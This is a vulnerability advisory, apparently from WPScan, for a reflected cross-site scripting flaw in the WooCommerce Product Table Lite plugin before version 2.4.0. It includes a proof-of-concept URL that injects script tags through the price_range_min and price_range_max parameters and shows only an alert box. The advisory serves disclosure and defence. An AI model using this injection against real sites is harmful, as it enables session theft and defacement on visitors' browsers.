WordPress Plugin Vulnerabilities

WooCommerce Product Table Lite < 2.4.0 - Reflected Cross-Site Scripting

Description

The plugin does not escape the price_range_min and price_range_max parameters before outputting them back in attributes, leading a Reflected Cross-Site Scripting issue

Proof of Concept

On a page where there is a Product Table with a Price filter, append the following payload to the min and max price filters:"><script>alert(/XSS/)

https://example.com/page-with-table-and-price-filter/?1601_price_range=option_0&1601_price_range_max=50"><script>alert(/XSS-max/)</script>&1601_price_range_min=10"><script>alert(/XSS-min/)</script>&

Affects Plugins

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes

Timeline

Publicly Published
2021-09-27 (about 2 years ago)
Added
2021-09-27 (about 2 years ago)
Last Updated
2021-09-27 (about 2 years ago)

Other